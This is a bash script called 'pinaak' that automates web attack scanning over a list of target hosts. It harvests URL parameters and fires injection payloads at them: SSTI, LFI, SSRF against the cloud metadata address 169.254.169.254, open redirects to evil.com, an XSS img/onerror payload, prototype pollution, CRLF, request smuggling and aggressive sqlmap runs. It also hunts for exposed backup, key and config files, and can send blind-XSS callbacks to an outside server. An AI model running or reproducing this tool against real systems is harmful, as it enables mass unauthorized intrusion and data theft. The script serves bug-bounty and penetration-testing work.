pinaak

#!/bin/bash
targetList=
threads=
bServer=
header="" # please add custom header before using pinaak
sPayload=~/tools/payloads/ssti.txt
intServer="" # please add interactsh server before using pinaak (http://test.interact.sh/)
lPayload=~/tools/payloads/lfi.txt

loadColors() {
    RED="\e[31m"
    NORMAL="\e[0m"
    YELLOW="\e[93m"
}

logo() {
    loadColors
    echo -e "${RED}
█▀█ █ █▄░█ ▄▀█ ▄▀█ █▄▀
█▀▀ █ █░▀█ █▀█ █▀█ █░█
coded by ${YELLOW}@R0X4R${RED} in INDIA${NORMAL}
"
}

usage() {
    loadColors
    echo -e " "
    echo -e "${RED}█▀█ █ █▄░█ ▄▀█ ▄▀█ █▄▀"
    echo -e "█▀▀ █ █░▀█ █▀█ █▀█ █░█"
    echo -e "coded by ${YELLOW}@R0X4R${RED} in INDIA${NORMAL} \n"
    echo -e "Usage: ./pinaak [options] [targetlist]"
    echo -e "   -l  List of targets [must have webprobed earlier] (subfinder -d target.com | httpx -silent | anew targets.txt)"
    echo -e "   -b  Add your xss server for Blind XSS finding [-b https://test.xss.ht] (you can get it from https://xsshunter.com/)"
    echo -e "   -t  Number of threads [-t int] (default 100) \n"
    echo -e "Example: ./pinaak -l [targetlist] -t [threads] -b [blind xss server]"
    exit 1
}

while getopts ":l:h:b:t:" o; do
    case "${o}" in
        l)
            targetList=${OPTARG} ;;

        b)
            bServer=${OPTARG} ;;

        t)
            threads=${OPTARG} ;;

        h)
            usage ;;

        *)
            usage ;;

    esac
done

if [ -z "$targetList" ]
  then
    loadColors
    echo -e " "
    echo -e "${RED}█▀█ █ █▄░█ ▄▀█ ▄▀█ █▄▀"
    echo -e "█▀▀ █ █░▀█ █▀█ █▀█ █░█"
    echo -e "${NORMAL}coded by ${YELLOW}@R0X4R${NORMAL} in INDIA"
    echo -e " "
    echo -e "${RED}[ERROR] - targetlist not supplied${NORMAL}"
    echo -e "To obtain targetlist: (subfinder -d target.com | httpx -silent | anew targets.txt)"
    echo -e "Usage: ./pinaak -l [targetlist] -t [threads] -b [xss server]"
    exit 1
fi

if [ -z "$threads" ]
    then
    threads=100
fi

if [ ! -d "pinaak_output" ]; then
    mkdir -p pinaak_output/
fi

cd pinaak_output/

information() {
    sleep 2s
    echo -e "$(cat $targetList | wc -l) targets loaded."
    echo -e "Threads: $threads"
}

getParams() {
    sleep 3s
    echo -e "\nGetting all the parameters"
    mkdir -p parameters/
    cat $targetList | gauplus --random-agent -retries 20 -t $threads -subs -b png,jpg,gif,svg | anew -q parameters/gau_output.txt
    cat $targetList | xargs -P 50 -I % bash -c "echo % | waybackurls" | anew -q parameters/way_output.txt
    cat parameters/*.txt | urldedupe -s | anew -q parameters/parameters.txt
}

filterParams() {
    sleep 3s
    echo -e "Filtering all the parameters"
    mkdir -p parameters/patterns/
    cat parameters/parameters.txt | gf xss | sed "s/'/ /g" | sed "s/(/ /g" | sed "s/)/ /g" | qsreplace "FUZZ" | anew -q parameters/patterns/xssPatterns.txt &> /dev/null
    cat parameters/parameters.txt | gf lfi | sed "s/'/ /g" | sed "s/(/ /g" | sed "s/)/ /g" | anew -q parameters/patterns/lfiPatterns.txt &> /dev/null
    cat parameters/parameters.txt | gf ssrf | sed "s/'/ /g" | sed "s/(/ /g" | sed "s/)/ /g" | anew -q parameters/patterns/ssrfPatterns.txt &> /dev/null
    cat parameters/parameters.txt | gf ssti | sed "s/'/ /g" | sed "s/(/ /g" | sed "s/)/ /g" | anew -q parameters/patterns/sstiPatterns.txt &> /dev/null
    cat parameters/parameters.txt | gf sqli | sed "s/'/ /g" | sed "s/(/ /g" | sed "s/)/ /g" | anew -q parameters/patterns/sqliPatterns.txt &> /dev/null
    cat parameters/parameters.txt | gf redirect | sed "s/'/ /g" | sed "s/(/ /g" | sed "s/)/ /g" | anew -q parameters/patterns/redirectPatterns.txt &> /dev/null
    cat $sPayload | while read -r line; do cat parameters/patterns/sstiPatterns.txt | qsreplace "$line" | anew -q checkSSTI.txt;done 2> /dev/null
    cat $lPayload | while read -r line; do cat parameters/patterns/lfiPatterns.txt | qsreplace "$line" | anew -q checkLFI.txt;done 2> /dev/null
    cat parameters/patterns/ssrfPatterns.txt | qsreplace "$intServer" | anew -q checkSSRF.txt
    cat parameters/parameters.txt | cut -d"?" -f1 | cut -d"=" -f1 | anew -q checkSensitive.txt
    cat parameters/patterns/redirectPatterns.txt | qsreplace "FUZZ" | anew -q checkRedirect.txt
    cat parameters/patterns/sqliPatterns.txt | qsreplace "FUZZ" | anew -q checkSQLI.txt
}

runNuclei() {
    sleep 3s
    echo -e "Scanning for template based vulnerabilities"
    nuclei -update-templates &> /dev/null
    mkdir nuclei_output/
    cat $targetList | while read -r line; do nuclei -target $line -t ~/nuclei-templates/ -severity low -c 200 -silent; done | anew -q nuclei_output/low.txt
    cat $targetList | while read -r line; do nuclei -target $line -t ~/nuclei-templates/ -severity medium -c 200 -silent; done | anew -q nuclei_output/medium.txt
    cat $targetList | while read -r line; do nuclei -target $line -t ~/nuclei-templates/ -severity high -c 200 -silent; done | anew -q nuclei_output/high.txt
    cat $targetList | while read -r line; do nuclei -target $line -t ~/nuclei-templates/ -severity critical -c 200 -silent; done | anew -q nuclei_output/critical.txt
}

runInjections() {
    sleep 3s
    echo -e "Checking injection attacks (may contains false positive)"
    mkdir injects/
    crlfuzz -l $targetList -c $threads -s | anew -q injects/crlf.txt 2> /dev/null
    sed 's/$/\?__proto__[testparam]=exploit/' $targetList | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' 2> /dev/null | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE" | anew -q proto.txt &> /dev/null
    cat checkSSTI.txt | xargs -P 100 -I % bash -c "curl -s -L '%' | grep \"check-ssti49\" && echo -e \"[VULNERABLE] - % \n \"" 2> /dev/null | grep "VULNERABLE" | anew -q injects/ssti.txt &> /dev/null
    cat checkLFI.txt | xargs -P 100 -I % bash -c "curl -s -L '%' | grep \"root:\" && echo -e \"[VULNERABLE] - % \n \"" 2> /dev/null | grep "VULNERABLE" | anew -q injects/lfi.txt &> /dev/null
    cat parameters/parameters.txt | sed "s/'/ /g" | sed "s/)/ /g" | sed "s/(/ /g" | qsreplace "http://169.254.169.254/latest/meta-data/hostname" | xargs -I % -P 50 bash -c "curl -ks '%' | grep \"compute.internal\" && echo -e \"[VULNERABLE] - % \n \"" 2> /dev/null | grep "VULNERABLE" | anew -q injects/ssrf.txt &> /dev/null
    ffuf -w checkSSRF.txt -u FUZZ -p "0.6-1.2" -H "$header" -t $threads -s &> /dev/null
    cat checkSensitive.txt | grep -iaE "([^.]+)\.zip$|([^.]+)\.zip\.[0-9]+$|([^.]+)\.zip[0-9]+$|([^.]+)\.zip[a-z][A-Z][0-9]+$|([^.]+)\.zip\.[a-z][A-Z][0-9]+$|([^.]+)\.rar$|([^.]+)\.tar$|([^.]+)\.tar\.gz$|([^.]+)\.tgz$|([^.]+)\.sql$|([^.]+)\.db$|([^.]+)\.sqlite$|([^.]+)\.pgsql\.txt$|([^.]+)\.mysql\.txt$|([^.]+)\.gz$|([^.]+)\.config$|([^.]+)\.log$|([^.]+)\.bak$|([^.]+)\.backup$|([^.]+)\.bkp$|([^.]+)\.crt$|([^.]+)\.dat$|([^.]+)\.eml$|([^.]+)\.java$|([^.]+)\.lst$|([^.]+)\.key$|([^.]+)\.passwd$|([^.]+)\.pl$|([^.]+)\.pwd$|([^.]+)\.mysql-connect$|([^.]+)\.jar$|([^.]+)\.cfg$|([^.]+)\.dir$|([^.]+)\.orig$|([^.]+)\.bz2$|([^.]+)\.old$|([^.]+)\.vbs$|([^.]+)\.img$|([^.]+)\.inf$|([^.]+)\.sh$|([^.]+)\.py$|([^.]+)\.vbproj$|([^.]+)\.mysql-pconnect$|([^.]+)\.war$|([^.]+)\.go$|([^.]+)\.psql$|([^.]+)\.sql\.gz$|([^.]+)\.vb$|([^.]+)\.webinfo$|([^.]+)\.jnlp$|([^.]+)\.cgi$|([^.]+)\.temp$|([^.]+)\.ini$|([^.]+)\.webproj$|([^.]+)\.xsql$|([^.]+)\.raw$|([^.]+)\.inc$|([^.]+)\.lck$|([^.]+)\.nz$|([^.]+)\.rc$|([^.]+)\.html\.gz$|([^.]+)\.gz$|([^.]+)\.env$|([^.]+)\.yml$" | anew -q injects/files.txt
    python3 ~/tools/OpenRedireX/openredirex.py -l checkRedirect.txt --keyword FUZZ -p ~/tools/OpenRedireX/payloads.txt 2> /dev/null | grep "^http" | sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" | anew -q injects/opredirect.txt &> /dev/null
    cat checkRedirect.txt | grep -a -i "\=http" | qsreplace "http://www.evil.com/" | xargs -P 50 -I % bash -c "curl -s -L '%' -I | grep \"evil.com\" && echo -e \"[VULNERABLE] - % \n \"" 2> /dev/null | grep "VULNERABLE" | anew -q injects/redirect.txt &> /dev/null
    cat parameters/patterns/xssPatterns.txt | qsreplace "\"><img src=x onerror=confirm(document.domain)>" | xargs -P 50 -I % bash -c "curl -s -L '%' | grep \"<img src=x onerror=confirm(document.domain)>\" && echo -e \"[VULNERABLE] - % \n \"" 2> /dev/null | grep "VULNERABLE" | anew -q injects/xss.txt &> /dev/null
    cat parameters/patterns/xssPatterns.txt | xargs -P 30 -I % bash -c "echo % | kxss" 2> /dev/null | anew -q injects/kxss.txt &> /dev/null
    cat $targetList | xargs -P 50 -I % bash -c "python3 ~/tools/smuggler/smuggler.py -u '%' --log injects/smuggle.txt --quiet 2> /dev/null" &> /dev/null
    cat checkSQLI.txt | xargs -P 30 -I % bash -c "python3 ~/tools/sqlmap/sqlmap.py -u % -b --batch --disable-coloring --random-agent --risk 3 --level 5 --output-dir=injects/sql/ 2> /dev/null" &> /dev/null
    if [ -n "$bServer" ]
        then
            dalfox file parameters/patterns/xssPatterns.txt pipe --silence --no-color --no-spinner --mass --mass-worker 100 --skip-bav -w $threads -b $bServer 2> /dev/null | anew -q injects/dalfox.txt &> /dev/null
        else
            dalfox file parameters/patterns/xssPatterns.txt pipe --silence --no-color --no-spinner --mass --mass-worker 100 --skip-bav -w $threads 2> /dev/null | anew -q injects/dalfox.txt &> /dev/null
    fi
}

processFinal() {
    sleep 3s
    clear
    logo
    echo -e "Finalising things"
    rm -rf check* &> /dev/null
    rm -rf parameters/gau_output.txt parameters/way_output.txt &> /dev/null
}

sendNotification() {
    sleep 5s
    clear
    logo
    echo -e "Sending notifications"
    echo -e "$(cat injects/*.txt nuclei_output/*.txt | wc -l ) total vunerabilities found" | notify -silent &> /dev/null
    cat injects/*.txt nuclei_output/*.txt 2> /dev/null | notify -silent &> /dev/null
    echo -e "Check $(pwd)/injects/sql/ folder for sqli vulnerabilities" | notify -silent &> /dev/null
    echo "Thanks for using Pinaak. Have a great day :)" | notify -silent &> /dev/null
    echo -e "Thanks for using Pinaak. Have a great day :)"
    exit 1
}

runTool() {
    information
    getParams
    filterParams
    runNuclei
    runInjections
    processFinal
    sendNotification
}

while true
do
    loadColors
    logo
    runTool
done